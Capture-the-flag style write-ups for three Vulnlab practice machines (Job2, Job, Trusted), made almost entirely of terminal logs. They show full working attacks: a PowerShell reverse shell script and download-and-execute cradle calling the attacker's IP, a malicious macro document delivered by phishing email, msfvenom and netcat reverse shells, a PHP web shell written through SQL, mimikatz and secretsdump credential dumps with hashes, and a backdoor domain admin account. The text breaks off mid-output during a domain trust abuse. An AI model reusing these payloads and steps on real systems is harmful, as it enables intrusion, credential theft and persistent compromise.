┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.122.114] 50302
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\Windows\system32>whoami
job2\julian

C:\Windows\system32>net users

User accounts for \\JOB2

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand                
Guest                    Julian                   svc_veeam                
WDAGUtilityAccount       
The command completed successfully.


C:\Windows\system32>

Next I did a brute-force

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ crackmapexec winrm 10.10.122.114 -u Ferdinand -p /usr/share/wordlists/rockyou.txt

SMB         10.10.122.114   5985   JOB2             [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2)
HTTP        10.10.122.114   5985   JOB2             [*] http://10.10.122.114:5985/wsman
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:12345
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456789
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:password
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:iloveyou

and it found Ferdinand’s pass

next evil-winrm to the box, and find VEEAM Backup installed

and used CVE-2023-27532-RCE-Only , to finish JOB2

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i 10.10.122.114
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
  TCP    0.0.0.0:9401           0.0.0.0:0              LISTENING       2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> 

.

*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
                                        
Data: 573544 bytes of 573544 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
                                        
Data: 5925652 bytes of 5925652 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target 127.0.0.1 --cmd c:\temp\rcat_10.8.2.138_443.exe
Targeting 127.0.0.1:9401

and catch the admin shell

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.103.24] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system

PS C:\users\Administrator\Desktop> dir
dir


    Directory: C:\users\Administrator\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          5/3/2023   2:04 PM           1029 LINQPad 5.lnk                                                        
-a----          5/3/2023   4:00 PM             36 root.txt                                                             


PS C:\users\Administrator\Desktop> type root.txt
type root.txt
VL{62e<REDACTED>2b7}
PS C:\users\Administrator\Desktop>

 

That’s all.

Beyond root

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

764     {0;000003e7} 1 D 29290          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01a2aee9} 3 F 35131903    JOB2\puck       S-1-5-21-3935782767-3829597994-1046841959-1004  (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 37906026    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959

SAMKey : 36c26e0a457c1d613a608d104acca9e9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 6f2<REDACTED>04a

 

C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat

powershell \windows\phishsim.ps1

phissim.ps1

Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
$action =
{
    $name = $event.SourceEventArgs.FullPath    
    $changetype = $event.SourceEventArgs.ChangeType    
    Write-Host "$name was $changetype at $(get-date)"
    if(!$name.Contains("~")){
        if(Test-Path $name){    
            Write-Host "Opening $name"
            Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
            sleep 45
            Write-Host "Resetting.."
            Get-Process "WINWORD.EXE" | Stop-Process -Force             
            Get-Process "WINWORD" | Stop-Process -Force  
            sleep 5
            Remove-Item $name -Force
         }
    }    
}
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action

for(;;){
    sleep 45
}

 

 

 

vulnlab-job

vulnlab-job

From Phishing to adminEnrique A.
Tools used : sendmail , msfconsole , msfvenom , godpotato

nmap scan

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-28T14:15:50+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-28T14:15:10+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2024-06-27T12:41:55
|_Not valid after:  2024-12-27T12:41:55
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-06-28T14:15:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds

 

cat /etc/hosts | grep job
10.10.114.36 job.local

website shows one email: career@job.local

Also, it states that if you are sending your resume, it should be as a libre office document

Phishing try1 getting some windows hashes

1st generata a msf payload

use auxiliary/fileformat/odt_badodt
set LHOST tun0
run

then send a mail, and catch the hashes received

sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey http://10.8.2.138/test" -a bad.odt 
Jun 21 15:46:10 kali sendemail[162513]: Email was sent successfully!
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.99.156,51049)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:9b4c1be9c604bc2f1fdd46f203c4c1b3:010100000000000080f42a66e1c3da016f7c8cc4409768a80000000001001000640069004c004900700078006a00770003001000640069004c004900700078006a007700020010005500480078006a00430067004b007700040010005500480078006a00430067004b0077000700080080f42a66e1c3da0106000400020000000800300030000000000000000000000000200000f3afad144322c33a39d814751dfc312d1dd988dd18fbcedeab107cb49d9d84730a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.99.156,51049)
[*] Remaining connections []
[*] Incoming connection (10.10.99.156,51050)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] 

The hash was uncrackable with john and rockyou.txt

.

Seems phishing is the way to go. So what I did is the following.

The following write-up provides a very good example on how to do this:

https://0xdf.gitlab.io/2020/02/01/htb-re.html

msf6 > set payload windows/x64/exec
payload => windows/x64/exec
msf6 > set LHOST 10.8.2.138
LHOST => 10.8.2.138
msf6 > set LPORT 80
LPORT => 80
msf6 > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');"
cmd => powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');

shell.txt

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cat shell.txt            
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.8.2.138'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}
                                                                                                                          

 

 

.
msf6 exploit(multi/misc/openoffice_document_macro) > show options

Module options (exploit/multi/misc/openoffice_document_macro):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BODY                       no        The message for the document body
   FILENAME  msf.odt          yes       The OpenOffice Text document name
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                         local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (windows/x64/exec):

   Name      Current Setting                         Required  Description
   ----      ---------------                         --------  -----------
   CMD       powershell.exe -nop -w hidden -ep bypa  yes       The command string to execute
             ss -c IEX(New-Object Net.WebClient).Do
             wnloadString('http://10.8.2.138/shell.
             txt');
   EXITFUNC  thread                                  yes       Exit technique (Accepted: '', seh, thread, process, none)


Exploit target:

   Id  Name
   --  ----
   0   Apache OpenOffice on Windows (PSH)



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/openoffice_document_macro) > set srvport 80
srvport => 80
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Using URL: http://10.8.2.138/7Jnb1x3
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/puck/.msf4/local/msf.odt
exit
[*] Server stopped.
[*] Server stopped.

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cp /home/puck/.msf4/local/msf.odt.

now the mailicious odtis downloaded

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:05:37] "GET /7Jnb1x3 HTTP/1.1" 200 -


──(puck㉿kali)-[~/vulnlab/job]
└─$ sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a msf.odt
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rm 7Jnb1x3 
└─$ cp cp shell.txt 7Jnb1x3 


run again !
sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138>
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

now the shell is downloaded
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:02:57] "GET /7Jnb1x3 HTTP/1.1" 200 -
10.10.114.36 - - [28/Jun/2024 10:04:02] "GET /7Jnb1x3 HTTP/1.1" 200 -


And we catch the shell as user

.
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rlwrap nc -nlvp 443                  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 52139
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
job\jack.black

c:\Users\jack.black\Desktop>type user.txt
VL{0fa1<REDACTED>5dc1}
PS C:\inetpub\wwwroot> dir


    Directory: C:\inetpub\wwwroot


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        11/10/2021   8:52 PM                aspnet_client                                                        
d-----         11/9/2021   9:24 PM                assets                                                               
d-----         11/9/2021   9:24 PM                css                                                                  
d-----         11/9/2021   9:24 PM                js                                                                   
-a----        11/10/2021   9:01 PM            298 hello.aspx                                                           
-a----         11/7/2021   1:05 PM           3261 index.html                                                           


PS C:\inetpub\wwwroot> curl http://10.8.2.138/cmdasp.aspx -o cmdasp.aspx
PS C:\inetpub\wwwroot> curl http://10.8.2.138/reverse.aspx -o reverse.aspx

 

Privesc

After checking files on folders on this machine, I noticed that inetpub/wwwroot will allow us to upload files to the website

I created a aspx revshell with

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f aspx > reverse.aspx

ant then did a curl http://job.local/reverse.aspx , to get a new shell

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53689
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140720521084928
[*] DispatchTable: 0x140720523675512
[*] UseProtseqFunction: 0x140720522968944
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\a0c54595-80de-4e4f-a985-93a2101db089\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0854-ffff-ad4d-dae1b390a835
[*] DCOM obj OXID: 0x7374a001401060e1
[*] DCOM obj OID: 0x734f5c52566383ce
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3552

and we have a admin shell

SeImpersonatePrivilege is enabled. , so we used GodPotato

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53837
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{0102<REDACTED>5152}

 

That’s all.
We now have  a Admin reverse shell.

 

vulnlab-trusted

Vulnlab trusted

nmap

enum

gobuster dir -x php -w /usr/share/wordlists/dirb/big.txt -u http://10.10.146.246/dev/

http://lab.trusted.vl/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php

echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d  
<?php 
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>

.

upload php shell ( crackstation can crack Robert’s hash )

──(puck㉿kali)-[~/vulnlab/trusted]
└─$ mysql -u root -h lab.trusted.vl -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 8
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use news
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bbef42f0fbfa3007b368def7 |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4df9325b502a02f11043e0ad |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.022 sec)
MariaDB [news]> select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php';
Query OK, 1 row affected (0.023 sec)

MariaDB [news]> exit

trigger shell

http://lab.trusted.vl/dev/back.php?c=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/puckshell.txt');/

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.146.246 - - [26/Jun/2024 08:13:02] "GET /puckshell.txt HTTP/1.1" 200 -


┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.146.246] 64409
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\dev>whoami
nt authority\system

Get some more hashes

C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

c:\temp>curl http://10.8.2.138/mimikatz.exe -o mimi.exe

C:\temp>mimi

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/


mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1685702 (00000000:0019b8c6)
Session           : Batch from 0
User Name         : cpowers
Domain            : LAB
Logon Server      : LABDC
Logon Time        : 6/26/2024 6:30:01 AM
SID               : S-1-5-21-2241985869-2159962460-1278545866-1107
    msv :	
     [00000003] Primary
     * Username : cpowers
     * Domain   : LAB
     * NTLM     : 322db798a55f85f09b3d61b976a13c43
     * SHA1     : e845d39122d58246ff7e28a282e8ed0e19ede373
     * DPAPI    : 01644e36ac919f8de1101ff9fde5a7fb
    tspkg :	
    wdigest :	
     * Username : cpowers
     * Domain   : LAB
     * Password : (null)
    kerberos :	
     * Username : cpowers
     * Domain   : LAB.TRUSTED.VL
     * Password : (null)
    ssp :	
    credman :	
    cloudap :	




mimikatz # exit
Bye!


examine more

C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

C:\temp>net user puck Passw0rd123! /add /domain
The command completed successfully.


C:\temp>net localgroup Administrators puck /add /domain
The command completed successfully.


C:\temp>

We can now also rdp to lab.trusted.vl

──(puck㉿kali)-[~/vulnlab/trusted]
└─$ xfreerdp /v:10.10.250.102 /u:puck          
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - CN = labdc.lab.trusted.vl
Password: 

 

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-secretsdump 'puck@lab.trusted.vl'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x68580865f85a4743db214876adf784df
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:86a9ee70dfd64d20992283dc5721b475:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
puck:2102:aad3b435b51404eeaad3b435b51404ee:ab4f5a5c42df5a0ee337d12ce77332f5:::
LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:61f6701481ff18844346b2f8ca47119a:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:88b2e30fba183f0fcdaba561a6ae64f5:::
[*] Kerberos keys grabbed

                                                                                                              
┌──(puck㉿kali)-[~/vulnlab/trusted]

 

 

then evil-winrm in lab.trusted.vl

                                                                                                              
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u puck -p Passw0rd123! -i lab.trusted.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\puck\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> whoami
lab\puck
*Evil-WinRM* PS C:\temp> . ./PowerView.ps1


At C:\temp\PowerView.ps1:

Forest                  : trusted.vl
DomainControllers       : {labdc.lab.trusted.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : trusted.vl
PdcRoleOwner            : labdc.lab.trusted.vl
RidRoleOwner            : labdc.lab.trusted.vl
InfrastructureRoleOwner : labdc.lab.trusted.vl
Name                    : lab.trusted.vl

Forest                  : trusted.vl
DomainControllers       :
Children                :
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            :
RidRoleOwner            :
InfrastructureRoleOwner :
Name                    : trusted.vl



*Evil-WinRM* PS C:\temp> Get-DomainTrust


SourceName      : lab.trusted.vl
TargetName      : trusted.vl
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 9/14/2022 6:42:24 PM
WhenChanged     : 6/26/2024 6:21:06 AM


 

Trust Abuse

Using article, we can abuse  child->parent domain trust relationship and escalate to enterprise domain.

We need the krbtgt hash of lab.trusted.vl and the SIDs of both domains, then with mimikatz we  forge a golden ticket for the enterprise domain admin

lsadump::dcsync /domain:lab.trusted.vl /all

 

Getting the domain SID of lab.trusted.vl and trusted.vl by running

*Evil-WinRM* PS C:\temp> ./mimi.exe  "lsadump::trust /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866)

Domain: TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591)
 [  In ] LAB.TRUSTED.VL -> TRUSTED.VL
